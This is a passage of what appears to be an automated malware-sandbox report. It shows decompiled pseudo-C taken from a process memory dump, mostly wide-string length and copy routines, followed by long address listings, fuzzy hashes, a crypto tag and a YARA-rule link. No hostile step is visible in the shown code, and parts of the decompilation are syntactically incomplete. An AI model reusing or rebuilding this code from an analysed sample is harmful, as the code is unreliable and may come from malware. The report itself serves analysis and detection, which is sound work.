					if(_t277 == 0) {
						L18:
						asm("pxor xmm0, xmm0");
						_t429 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
						__eflags = _t429;
						_v64 = _t429;
						_t467 = _t429;
						while(1) {
							asm("movdqu xmm1, [edx+eax*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edi, xmm1");
							__eflags = _t429;
							if(_t429 != 0) {
								break;
							}
							_t277 = _t277 + 8;
							__eflags = _t277 - _t467;
							if(_t277 < _t467) {
								continue;
							}
							_v64 = _t467;
							_t445 = _a4;
							__eflags = _v64 - 0x7fffffff;
							if(_v64 >= 0x7fffffff) {
								L25:
								_v64 = 0x7fffffff;
								L26:
								_t433 = _v64 + 1;
								__eflags = _t433 - 0x40;
								_t434 =  <=  ? 0x40 : _t433;
								__eflags = _t434;
								if(_t434 > 0) {
									_t283 = (_t434 >> 5 >> 0x1a) + _t434 >> 6;
									_t435 = _t434 & 0x8000003f;
									__eflags = _t435;
									if(_t435 < 0) {
										_t435 = (_t435 - 0x00000001 | 0xffffffc0) + 1;
										__eflags = _t435;
									}
									__eflags = _t435;
									_t284 = _t283 + (0 | _t435 > 0x00000000);
									_v40 = _t284 << 6;
									_push(_t284 << 7);
									_v68 = _t364;
									_t286 = E008A1030();
									_t411 = _v68;
									_t473 = _t473 + 4;
									_t418 = _t286;
									 *_t286 = 0;
									_v32 = _t294;
									_t468 = _v64;
									while(1) {
										_t312 =  *_t411 & 0x0000ffff;
										_t316 = 1;
										 *_t286 = _t312;
										__eflags = _t468;
										if(_t468 == 0) {
											goto L35;
										}
										__eflags = 1 - _t468;
										if(1 == _t468) {
											__eflags = 0;
											_t445 = _a4;
											_t294 = _v32;
											_t286[0] = 0;
											L191:
											__eflags =  *_t294 - 1;
											if( *_t294 > 1) {
												goto L39;
											}
											goto L192;
										}
										L35:
										__eflags = _t312;
										if(_t312 == 0) {
											_t445 = _a4;
											_t294 = _v32;
											goto L191;
										}
										_t286 =  &(_t286[0]);
										_t411 = _t411 + 2;
										__eflags = _t411;
									}
								}
								_t418 = 0;
								__eflags = _t316 - 1;
								if(_t316 <= 1) {
									goto L70;
								}
								_v40 = 0;
								goto L39;
							}
							L22:
							_t287 = _v64;
							while(1) {
								__eflags =  *(_t364 + _t287 * 2) & 0x0000ffff;
								if(( *(_t364 + _t287 * 2) & 0x0000ffff) == 0) {
									break;
								}
								_t287 = _t287 + 1;
								__eflags = _t287 - 0x7fffffff;
								if(_t287 < 0x7fffffff) {
									continue;
								}
								goto L25;
							}
							_v64 = _t287;
							goto L26;
						}
						asm("bsf edi, edi");
						_t445 = _a4;
						_v64 = (_t429 >> 1) + _t277;
						goto L26;
					}
					_t441 = 0;
					_v64 = 0;
					__eflags = _t277 & 0x00000001;
					if((_t277 & 0x00000001) != 0) {
						goto L22;
					}
					_t277 =  ~_t277 + 0x10 >> 1;
					__eflags = _t277;
					while(1) {
						__eflags =  *(_t364 + _t441 * 2) & 0x0000ffff;
						if(( *(_t364 + _t441 * 2) & 0x0000ffff) == 0) {
							break;
						}
						_t441 = _t441 + 1;
						__eflags = _t441 - _t277;
						if(_t441 < _t277) {
							continue;
						}
						goto L18;
					}
					_v64 = _t441;
					_t445 = _a4;
					goto L26;
				}
				_push(0x80);
				 *_t445 = 0;
				_t445[1] = 0;
				_t313 = E008A1030();
				_t474 = _t473 + 4;
				_t414 =  *_t445;
				if(_t414 == 0) {
					__eflags = 0;
					 *_t313 = 0;
					L9:
					 *_t445 = _t313;
					_t445[1] = 0x40;
					goto L115;
				}
				if(_t313 == 0) {
					L7:
					_push(2);
					_push(_t414);
					E008A10B0();
					_t474 = _t474 + 8;
					goto L9;
				}
				_t361 =  *_t414 & 0x0000ffff;
				 *_t313 = _t361;
				if(_t361 == 0) {
					goto L7;
				}
				_t362 = 0;
				while(1) {
					_t362 = _t362 + 1;
					_t442 =  *(_t414 + _t362 * 4 - 2) & 0x0000ffff;
					 *(_t313 + _t362 * 4 - 2) = _t442;
					if(_t442 == 0) {
						goto L7;
					}
					_t443 =  *(_t414 + _t362 * 4) & 0x0000ffff;
					 *(_t313 + _t362 * 4) = _t443;
					if(_t443 != 0) {
						continue;
					}
					goto L7;
				}
				goto L7;
			}

0x008ad039
0x008ad043
0x008ad04f
0x008ad051
0x008ad054
0x008ad058
0x008ad0c6
0x008ad0c8
0x008ad0ca
0x008ad214
0x008ad214
0x008ad21e
0x008ad220
0x008ad225
0x008ad228
0x008ad22b
0x008ad3a1
0x008ad3a3
0x008ad3a5
0x008ad3a8
0x008ad3aa
0x008ad507
0x008ad507
0x008ad511
0x008ad513
0x008ad516
0x008ad518
0x008ad51a
0x008ad554
0x008ad556
0x008ad559
0x008ad559
0x008ad55b
0x008ad562
0x008ad562
0x008ad564
0x008ad565
0x008ad56a
0x008ad56d
0x008ad56d
0x008ad573
0x008ad577
0x008ad57b
0x008ad581
0x008ad5dc
0x008ad5dc
0x008ad5de
0x008ad5df
0x008ad5e7
0x008ad5fa
0x008ad5fa
0x008ad585
0x008ad587
0x008ad8fb
0x008ad5c2
0x008ad5c7
0x008ad5c9
0x008ad5cf
0x008ad5d1
0x008ad5d3
0x008ad5d8
0x008ad5d8
0x008ad5cf
0x00000000
0x008ad5c7
0x008ad58d
0x008ad58f
0x008ad591
0x008ad591
0x008ad596
0x008ad598
0x008ad59a
0x008ad59f
0x008ad59f
0x008ad5a3
0x008ad5a9
0x008ad5ab
0x008ad5ad
0x008ad5b2
0x008ad5b2
0x008ad5b6
0x008ad5b7
0x008ad5bb
0x008ad5be
0x00000000
0x008ad5be
0x008ad51c
0x008ad51e
0x008ad547
0x008ad547
0x008ad549
0x008ad54a
0x008ad54f
0x00000000
0x008ad54f
0x008ad520
0x008ad523
0x008ad526
0x008ad528
0x00000000
0x00000000
0x008ad52a
0x008ad52a
0x008ad52c
0x008ad52c
0x008ad52d
0x008ad532
0x008ad537
0x008ad539
0x00000000
0x00000000
0x008ad53b
0x008ad53f
0x008ad543
0x008ad545
0x00000000
0x00000000
0x00000000
0x008ad545
0x00000000
0x008ad52c
0x008ad3b0
0x008ad3b3
0x008ad3b5
0x00000000
0x00000000
0x008ad3bd
0x008ad3bd
0x008ad3c0
0x008ad3dd
0x008ad3e1
0x008ad3ed
0x008ad3ed
0x008ad3f3
0x008ad3f3
0x008ad3f8
0x008ad3fc
0x008ad400
0x008ad402
0x00000000
0x00000000
0x008ad408
0x008ad40b
0x008ad40d
0x00000000
0x00000000
0x008ad40f
0x008ad415
0x008ad428
0x008ad428
0x008ad42d
0x008ad432
0x008ad432
0x008ad435
0x008ad438
0x008ad43b
0x008ad43d
0x008ad450
0x008ad453
0x008ad453
0x008ad458
0x008ad460
0x008ad460
0x008ad460
0x008ad463
0x008ad468
0x008ad472
0x008ad476
0x008ad477
0x008ad47c
0x008ad47f
0x008ad481
0x008ad483
0x008ad4c8
0x008ad4ca
0x00000000
0x008ad485
0x008ad485
0x008ad487
0x008ad4b3
0x008ad4b3
0x008ad4b5
0x008ad4b6
0x008ad4ba
0x008ad4bf
0x008ad4c3
0x008ad4cd
0x008ad4d1
0x008ad4d4
0x008ad4d6
0x008ad4d6
0x008ad4d8
0x008ad4da
0x00000000
0x00000000
0x008ad4e0
0x008ad4ea
0x008ad4ea
0x008ad4ed
0x008ad4ee
0x008ad4f1
0x008ad4f3
0x00000000
0x00000000
0x008ad4f5
0x008ad4f7
0x008ad8db
0x008ad8de
0x00000000
0x008ad8de
0x008ad4fd
0x008ad4fd
0x008ad4ff
0x008ad8e7
0x00000000
0x008ad8e7
0x008ad4e4
0x008ad4e7
0x008ad4e7
0x008ad4e7
0x008ad4ea
0x008ad489
0x008ad48c
0x008ad48f
0x008ad491
0x00000000
0x00000000
0x008ad493
0x008ad493
0x008ad495
0x008ad495
0x008ad496
0x008ad49b
0x008ad4a0
0x008ad4a2
0x00000000
0x00000000
0x008ad4a4
0x008ad4a8
0x008ad4ac
0x008ad4ae
0x00000000
0x00000000
0x00000000
0x008ad4ae
0x008ad4b0
0x00000000
0x008ad4b0
0x008ad483
0x008ad43f
0x00000000
0x00000000
0x00000000
0x00000000
0x008ad417
0x008ad417
0x008ad41b
0x008ad41d
0x00000000
0x00000000
0x008ad41f
0x008ad420
0x008ad426
0x00000000
0x00000000
0x00000000
0x008ad426
0x00000000
0x008ad417
0x008ad8ef
0x008ad8f4
0x00000000
0x008ad8f4
0x008ad3c2
0x008ad3c4
0x008ad3c7
0x00000000
0x00000000
0x008ad3ce
0x008ad3ce
0x008ad3d0
0x008ad3d0
0x008ad3d4
0x008ad3d6
0x00000000
0x00000000
0x008ad3d8
0x008ad3d9
0x008ad3db
0x00000000
0x00000000
0x00000000
0x008ad3db
0x00000000
0x008ad3d0
0x008ad231
0x008ad239
0x008ad23b
0x008ad23c
0x008ad23e
0x008ad240
0x008ad244
0x008ad246
0x008ad246
0x008ad248
0x008ad977
0x008ad924
0x008ad924
0x008ad928
0x008ad2cb
0x008ad2d0
0x008ad2d0
0x008ad2d3
0x008ad2d6
0x008ad2d9
0x008ad2dd
0x008ad368
0x008ad36d
0x008ad36f
0x008ad373
0x008ad378
0x008ad382
0x008ad384
0x008ad386
0x00000000
0x00000000
0x008ad388
0x008ad38b
0x008ad38d
0x008ad5fd
0x008ad5ff
0x00000000
0x00000000
0x008ad607
0x008ad607
0x008ad60a
0x008ad626
0x008ad62a
0x008ad636
0x008ad636
0x008ad63c
0x008ad63c
0x008ad641
0x008ad645
0x008ad649
0x008ad64b
0x00000000
0x00000000
0x008ad651
0x008ad654
0x008ad656
0x00000000
0x00000000
0x008ad658
0x008ad65e
0x008ad671
0x008ad671
0x008ad676
0x008ad676
0x008ad678
0x008ad958
0x008ad701
0x008ad701
0x008ad701
0x008ad705
0x008ad707
0x008ad730
0x008ad733
0x008ad736
0x008ad73a
0x008ad7e1
0x008ad7e1
0x008ad7e3
0x008ad7e5
0x008ad919
0x008ad919
0x008ad91d
0x008ad91f
0x008ad920
0x008ad922
0x008ad92f
0x008ad934
0x008ad936
0x00000000
0x008ad936
0x00000000
0x008ad922
0x008ad7eb
0x008ad7ee
0x008ad7ee
0x008ad7f0
0x008ad81c
0x008ad81c
0x008ad81e
0x008ad820
0x008ad829
0x008ad85c
0x008ad85c
0x008ad860
0x008ad862
0x008ad865
0x008ad866
0x008ad868
0x008ad252
0x008ad254
0x008ad254
0x008ad257
0x008ad277
0x008ad27b
0x008ad287
0x008ad287
0x008ad28d
0x008ad28d
0x008ad292
0x008ad296
0x008ad29a
0x008ad29c
0x00000000
0x00000000
0x008ad2a2
0x008ad2a5
0x008ad2a7
0x00000000
0x00000000
0x008ad2a9
0x008ad2af
0x008ad2c6
0x008ad2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x008ad2b1
0x008ad2b1
0x008ad2b5
0x008ad2b7
0x00000000
0x00000000
0x008ad2bd
0x008ad2be
0x008ad2c4
0x00000000
0x00000000
0x00000000
0x008ad2c4
0x008ad8c6
0x008ad8c6
0x008ad8c9
0x008ad8d1
0x008ad8d1
0x00000000
0x008ad8c9
0x008ad96b
0x008ad970
0x00000000
0x008ad970
0x008ad259
0x008ad25b
0x008ad25d
0x00000000
0x00000000
0x008ad264
0x008ad264
0x008ad266
0x008ad266
0x008ad26a
0x008ad26c
0x00000000
0x00000000
0x008ad272
0x008ad273
0x008ad275
0x00000000
0x00000000
0x00000000
0x008ad275
0x00000000
0x008ad266
0x008ad93e
0x008ad895
0x008ad897
0x008ad899
0x00000000
0x008ad899
0x008ad82b
0x008ad82b
0x008ad833
0x008ad837
0x008ad83b
0x008ad83f
0x008ad83f
0x008ad843
0x008ad847
0x008ad849
0x00000000
0x00000000
0x008ad84b
0x008ad84b
0x008ad84f
0x008ad850
0x008ad852
0x00000000
0x00000000
0x00000000
0x008ad852
0x008ad854
0x008ad858
0x00000000
0x008ad858
0x008ad822
0x00000000
0x008ad822
0x008ad7f2
0x008ad7f6
0x008ad7f6
0x008ad7f8
0x008ad7fc
0x008ad7fc
0x008ad7fd
0x008ad804
0x008ad807
0x008ad809
0x00000000
0x00000000
0x008ad80e
0x008ad810
0x008ad812
0x00000000
0x00000000
0x00000000
0x008ad812
0x008ad814
0x008ad818
0x00000000
0x008ad818
0x008ad740
0x008ad74a
0x008ad74d
0x008ad74d
0x008ad752
0x008ad75a
0x008ad75a
0x008ad75a
0x008ad75b
0x008ad765
0x008ad76f
0x008ad773
0x008ad774
0x008ad778
0x008ad77d
0x008ad781
0x008ad783
0x008ad786
0x008ad788
0x008ad7da
0x008ad7dc
0x00000000
0x008ad78a
0x008ad78a
0x008ad78c
0x008ad7bd
0x008ad7bd
0x008ad7bf
0x008ad7c0
0x008ad7c4
0x008ad7c8
0x008ad7cd
0x008ad7d1
0x008ad7d5
0x008ad7df
0x008ad7df
0x00000000
0x008ad7df
0x008ad78e
0x008ad791
0x008ad794
0x008ad796
0x00000000
0x00000000
0x008ad798
0x008ad79c
0x008ad79c
0x008ad79e
0x008ad79e
0x008ad79f
0x008ad7a4
0x008ad7a9
0x008ad7ab
0x00000000
0x00000000
0x008ad7ad
0x008ad7b1
0x008ad7b5
0x008ad7b7
0x00000000
0x00000000
0x00000000
0x008ad7b7
0x008ad7b9
0x00000000
0x008ad7b9
0x008ad788
0x008ad709
0x008ad70b
0x008ad90e
0x008ad913
0x008ad724
0x008ad724
0x00000000
0x008ad724
0x00000000
0x008ad913
0x008ad711
0x008ad713
0x008ad716
0x008ad71b
0x00000000
0x00000000
0x008ad71d
0x00000000
0x008ad71d
0x008ad680
0x008ad680
0x008ad683
0x008ad6ac
0x008ad6b0
0x008ad6bc
0x008ad6c0
0x008ad6c0
0x008ad6c5
0x008ad6c5
0x008ad6ca
0x008ad6ce
0x008ad6d2
0x008ad6d4
0x00000000
0x00000000
0x008ad6da
0x008ad6dd
0x008ad6df
0x00000000
0x00000000
0x008ad6e1
0x008ad6e5
0x008ad6ea
0x008ad6fc
0x008ad6fc
0x00000000
0x00000000
0x00000000
0x00000000
0x008ad6ec
0x008ad6ec
0x008ad6f0
0x008ad6f2
0x00000000
0x00000000
0x008ad6f4
0x008ad6f5
0x008ad6fa
0x00000000
0x00000000
0x00000000
0x008ad6fa
0x00000000
0x008ad6ec
0x008ad948
0x008ad94b
0x008ad94d
0x008ad951
0x00000000
0x008ad951
0x008ad685
0x008ad687
0x008ad68a
0x00000000
0x00000000
0x008ad691
0x008ad691
0x008ad693
0x008ad697
0x008ad69b
0x008ad69d
0x00000000
0x00000000
0x008ad6a3
0x008ad6a4
0x008ad6a6
0x00000000
0x00000000
0x008ad6a8
0x00000000
0x008ad6a8
0x008ad905
0x00000000
0x00000000
0x00000000
0x00000000
0x008ad660
0x008ad660
0x008ad664
0x008ad666
0x00000000
0x00000000
0x008ad668
0x008ad669
0x008ad66f
0x00000000
0x00000000
0x00000000
0x008ad66f
0x00000000
0x008ad660
0x008ad95f
0x008ad964
0x00000000
0x008ad964
0x008ad60c
0x008ad60e
0x008ad610
0x00000000
0x00000000
0x008ad617
0x008ad617
0x008ad619
0x008ad619
0x008ad61d
0x008ad61f
0x00000000
0x00000000
0x008ad621
0x008ad622
0x008ad624
0x00000000
0x00000000
0x00000000
0x008ad624
0x00000000
0x008ad619
0x00000000
0x008ad38d
0x008ad2ed
0x008ad2f0
0x008ad2f0
0x008ad2f6
0x008ad2fe
0x008ad2fe
0x008ad2fe
0x008ad301
0x008ad306
0x008ad310
0x008ad314
0x008ad315
0x008ad31a
0x008ad31d
0x008ad31f
0x008ad361
0x008ad363
0x00000000
0x008ad321
0x008ad321
0x008ad323
0x008ad34c
0x008ad34c
0x008ad34e
0x008ad34f
0x008ad353
0x008ad358
0x008ad35c
0x008ad366
0x008ad366
0x00000000
0x008ad366
0x008ad325
0x008ad328
0x008ad32b
0x008ad32d
0x00000000
0x00000000
0x008ad32f
0x008ad32f
0x008ad331
0x008ad331
0x008ad332
0x008ad337
0x008ad33c
0x008ad33e
0x00000000
0x00000000
0x008ad340
0x008ad344
0x008ad348
0x008ad34a
0x00000000
0x00000000
0x00000000
0x008ad34a
0x00000000
0x008ad331
0x008ad31f
0x008ad24e
0x00000000
0x008ad393
0x008ad393
0x008ad395
0x008ad396
0x008ad396
0x008ad39e
0x00000000
0x008ad39e
0x008ad0d3
0x008ad0d5
0x00000000
0x00000000
0x008ad0dd
0x008ad0dd
0x008ad0e0
0x008ad107
0x008ad10b
0x008ad117
0x008ad117
0x008ad11d
0x008ad121
0x008ad123
0x008ad123
0x008ad128
0x008ad12c
0x008ad130
0x008ad132
0x00000000
0x00000000
0x008ad138
0x008ad13b
0x008ad13d
0x00000000
0x00000000
0x008ad13f
0x008ad143
0x008ad146
0x008ad14e
0x008ad168
0x008ad168
0x008ad170
0x008ad179
0x008ad17c
0x008ad17f
0x008ad182
0x008ad184
0x008ad1a8
0x008ad1ab
0x008ad1ab
0x008ad1b1
0x008ad1b9
0x008ad1b9
0x008ad1b9
0x008ad1bc
0x008ad1c1
0x008ad1cb
0x008ad1cf
0x008ad1d0
0x008ad1d4
0x008ad1d9
0x008ad1dd
0x008ad1e2
0x008ad1e4
0x008ad1e7
0x008ad1eb
0x008ad1f7
0x008ad1f7
0x008ad1fa
0x008ad1fb
0x008ad1fe
0x008ad200
0x00000000
0x00000000
0x008ad202
0x008ad204
0x008ad87f
0x008ad881
0x008ad884
0x008ad888
0x008ad88c
0x008ad88c
0x008ad88f
0x00000000
0x00000000
0x00000000
0x008ad88f
0x008ad20a
0x008ad20a
0x008ad20c
0x008ad8a1
0x008ad8a4
0x00000000
0x008ad8a4
0x008ad1f1
0x008ad1f4
0x008ad1f4
0x008ad1f4
0x008ad1f7
0x008ad186
0x008ad188
0x008ad18b
0x00000000
0x00000000
0x008ad191
0x00000000
0x008ad191
0x008ad150
0x008ad150
0x008ad154
0x008ad158
0x008ad15a
0x00000000
0x00000000
0x008ad160
0x008ad161
0x008ad166
0x00000000
0x00000000
0x00000000
0x008ad166
0x008ad8aa
0x00000000
0x008ad8aa
0x008ad8b3
0x008ad8ba
0x008ad8bd
0x00000000
0x008ad8bd
0x008ad0e2
0x008ad0e4
0x008ad0e8
0x008ad0ea
0x00000000
0x00000000
0x008ad0f1
0x008ad0f1
0x008ad0f3
0x008ad0f7
0x008ad0f9
0x00000000
0x00000000
0x008ad0ff
0x008ad100
0x008ad102
0x00000000
0x00000000
0x00000000
0x008ad104
0x008ad873
0x008ad877
0x00000000
0x008ad877
0x008ad05a
0x008ad061
0x008ad063
0x008ad06b
0x008ad06d
0x008ad070
0x008ad074
0x008ad0ae
0x008ad0b0
0x008ad0b3
0x008ad0b3
0x008ad0b5
0x00000000
0x008ad0b5
0x008ad078
0x008ad0a1
0x008ad0a1
0x008ad0a3
0x008ad0a4
0x008ad0a9
0x00000000
0x008ad0a9
0x008ad07a
0x008ad07d
0x008ad082
0x00000000
0x00000000
0x008ad084
0x008ad086
0x008ad086
0x008ad087
0x008ad08c
0x008ad093
0x00000000
0x00000000
0x008ad095
0x008ad099
0x008ad09f
0x00000000
0x00000000
0x00000000
0x008ad09f
0x00000000

Strings

@, xrefs: 008AD90E

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: bdcd8e5ad4679e6765e8cce677a5ccb90b384edccc57ab43d56afb15d044dd72
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 0D420871A0471287EB188E29C44123AB2E2FFD6754F29862CE8A7D7F95EB34DC41C781

Uniqueness

Uniqueness Score: -1.00%

Function 008B89F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008B89F0(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				unsigned int _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t205;
				signed int* _t207;
				signed int _t211;
				unsigned int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t223;
				intOrPtr* _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t253;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				unsigned int _t271;
				signed int _t277;
				void* _t278;
				signed int _t279;
				signed int _t280;
				short* _t283;
				signed int _t285;
				signed int _t286;
				intOrPtr* _t292;
				signed short* _t295;
				signed int* _t296;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				unsigned int _t309;
				signed int _t310;
				signed int _t313;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				void* _t322;
				signed int _t323;
				void* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				intOrPtr _t352;
				intOrPtr* _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				void* _t358;
				signed int _t359;
				signed int _t360;
				signed int* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t374;
				unsigned int _t381;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				signed short* _t405;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				intOrPtr* _t419;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				unsigned int _t431;
				signed int _t433;
				signed int _t439;
				signed int* _t441;
				signed int* _t442;
				signed int _t444;
				void* _t446;
				void* _t448;

				_push(_t298);
				_t446 = (_t444 & 0xfffffff0) - 0x24;
				_t419 = __ecx;
				_t352 =  *__ecx;
				if(_t352 != 0) {
					_t318 =  *( *( *(__ecx + 4)));
					__eflags = _t318;
					if(_t318 == 0) {
						L34:
						_push(0x80);
						_t299 = E008A1030();
						_t446 = _t446 + 4;
						__eflags =  *_t419 - 1;
						 *_t299 = 0;
						if( *_t419 <= 1) {
							goto L45;
						} else {
							_t374 = 0x40;
							goto L36;
						}
					} else {
						__eflags =  *_t318 & 0x0000ffff;
						if(( *_t318 & 0x0000ffff) == 0) {
							goto L34;
						} else {
							_t277 = _t318 & 0x0000000f;
							__eflags = _t277;
							if(_t277 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t414 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t414;
								while(1) {
									asm("movdqu xmm1, [ecx+eax*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t298;
									if(_t298 != 0) {
										break;
									}
									_t277 = _t277 + 8;
									__eflags = _t277 - _t414;
									if(_t277 < _t414) {
										continue;
									} else {
										__eflags = _t414 - 0x7fffffff;
										if(_t414 >= 0x7fffffff) {
											goto L22;
										} else {
											goto L20;
										}
									}
									goto L23;
								}
								asm("bsf edi, ebx");
								_t414 = (_t414 >> 1) + _t277;
							} else {
								_t414 = 0;
								__eflags = _t277 & 0x00000001;
								if((_t277 & 0x00000001) != 0) {
									while(1) {
										L20:
										__eflags =  *(_t318 + _t414 * 2) & 0x0000ffff;
										if(( *(_t318 + _t414 * 2) & 0x0000ffff) == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - 0x7fffffff;
										if(_t414 < 0x7fffffff) {
											continue;
										} else {
											L22:
											_t414 = 0x7fffffff;
										}
										goto L23;
									}
								} else {
									_t277 =  ~_t277 + 0x10 >> 1;
									__eflags = _t277;
									while(1) {
										_t298 =  *(_t318 + _t414 * 2) & 0x0000ffff;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - _t277;
										if(_t414 < _t277) {
											continue;
										} else {
											goto L16;
										}
										goto L23;
									}
								}
							}
							L23:
							_t23 = _t414 + 1; // 0x80000000
							_t278 = _t23;
							__eflags = _t278 - 0x40;
							_t279 =  <=  ? 0x40 : _t278;
							__eflags = _t279;
							if(_t279 > 0) {
								_t309 = (_t279 >> 5 >> 0x1a) + _t279 >> 6;
								_t280 = _t279 & 0x8000003f;
								__eflags = _t280;
								if(_t280 < 0) {
									_t280 = (_t280 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t280;
								}
								__eflags = _t280;
								_t310 = _t309 + (0 | _t280 > 0x00000000);
								_push(_t310 << 7);
								_v36 = _t310 << 6;
								_v52 = _t318;
								_t283 = E008A1030();
								_t350 = _v52;
								_t374 = _v36;
								_v48 = _t283;
								_t446 = _t446 + 4;
								_v40 = _t283;
								_v44 = 0;
								 *_t283 = 0;
								_v28 = _t419;
								_v52 =  *_t419;
								_t313 = _v44;
								_t441 = _v48;
								while(1) {
									_t285 =  *_t350 & 0x0000ffff;
									_t313 = _t313 + 1;
									 *_t441 = _t285;
									__eflags = _t414;
									if(_t414 == 0) {
										goto L32;
									}
									__eflags = _t313 - _t414;
									if(_t313 == _t414) {
										_v48 = _t441;
										__eflags = 0;
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
										_t441[0] = 0;
									} else {
										goto L32;
									}
									L177:
									__eflags = _t286 - 1;
									if(_t286 > 1) {
										goto L36;
									} else {
										goto L178;
									}
									goto L89;
									L32:
									__eflags = _t285;
									if(_t285 == 0) {
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
									} else {
										_t441 =  &(_t441[0]);
										_t350 = _t350 + 2;
										__eflags = _t350;
										continue;
									}
									goto L177;
								}
							} else {
								_t299 = 0;
								__eflags = _t352 - 1;
								if(_t352 <= 1) {
									L45:
									_t353 = _a4;
									 *_t353 = 0;
									 *((intOrPtr*)(_t353 + 4)) = 0;
									__eflags = _t299;
									if(_t299 == 0) {
										goto L80;
									} else {
										goto L46;
									}
								} else {
									_t374 = 0;
									L36:
									_t223 = _a8 & 0x0000ffff;
									_t403 = 1;
									_v36 = _t374;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t223;
										if(_t223 == 0) {
											_v28 = _t419;
										} else {
											__eflags = _t299;
											if(_t299 == 0) {
												_v28 = _t419;
												L182:
												_t425 = 0;
											} else {
												_v28 = _t419;
												L151:
												_t248 = _t299 & 0x0000000f;
												__eflags = _t248;
												if(_t248 == 0) {
													L156:
													asm("pxor xmm1, xmm1");
													_t439 =  ~( ~_t248 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t439;
													while(1) {
														asm("movdqu xmm0, [ebx+eax*2]");
														asm("pcmpeqw xmm0, xmm1");
														asm("pmovmskb edx, xmm0");
														__eflags = _t374;
														if(_t374 != 0) {
															break;
														}
														_t248 = _t248 + 8;
														__eflags = _t248 - _t439;
														if(_t248 < _t439) {
															continue;
														} else {
															__eflags = _t439 - 0x7fffffff;
															if(_t439 >= 0x7fffffff) {
																goto L162;
															} else {
																goto L160;
															}
														}
														goto L163;
													}
													asm("bsf esi, edx");
													_t425 = (_t439 >> 1) + _t248;
													goto L191;
												} else {
													_t439 = 0;
													__eflags = _t248 & 0x00000001;
													if((_t248 & 0x00000001) != 0) {
														while(1) {
															L160:
															__eflags =  *(_t299 + _t439 * 2) & 0x0000ffff;
															if(( *(_t299 + _t439 * 2) & 0x0000ffff) == 0) {
																goto L191;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - 0x7fffffff;
															if(_t439 < 0x7fffffff) {
																continue;
															} else {
																L162:
																_t425 = 0x7fffffff;
															}
															goto L163;
														}
														goto L191;
													} else {
														_t248 =  ~_t248 + 0x10 >> 1;
														__eflags = _t248;
														while(1) {
															_t374 =  *(_t299 + _t439 * 2) & 0x0000ffff;
															__eflags = _t374;
															if(_t374 == 0) {
																break;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - _t248;
															if(_t439 < _t248) {
																continue;
															} else {
																goto L156;
															}
															goto L163;
														}
														L191:
														__eflags = _t425 - 0xfffffffe;
														if(_t425 == 0xfffffffe) {
															 *_t299 = 0;
														}
													}
												}
											}
											L163:
											_t158 = _t425 + 2; // -2147483652
											_t324 = _t158;
											__eflags = _t324 - 0x40;
											_t325 =  <=  ? 0x40 : _t324;
											__eflags = _t325 - _v36;
											if(_t325 > _v36) {
												_t381 = (_t325 >> 5 >> 0x1a) + _t325 >> 6;
												_t326 = _t325 & 0x8000003f;
												__eflags = _t326;
												if(_t326 < 0) {
													_t326 = (_t326 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t326;
												}
												__eflags = _t326;
												_t382 = _t381 + (0 | _t326 > 0x00000000);
												_v36 = _t382 << 6;
												_push(_t382 << 7);
												_t384 = E008A1030();
												_t446 = _t446 + 4;
												__eflags = _t299;
												if(_t299 == 0) {
													__eflags = 0;
													 *_t384 = 0;
												} else {
													__eflags = _t384;
													if(_t384 != 0) {
														_t242 =  *_t299 & 0x0000ffff;
														 *_t384 = _t242;
														__eflags = _t242;
														if(_t242 != 0) {
															_t243 = 0;
															__eflags = 0;
															while(1) {
																_t243 = _t243 + 1;
																_t329 =  *(_t299 + _t243 * 4 - 2) & 0x0000ffff;
																 *(_t384 + _t243 * 4 - 2) = _t329;
																__eflags = _t329;
																if(_t329 == 0) {
																	goto L172;
																}
																_t330 =  *(_t299 + _t243 * 4) & 0x0000ffff;
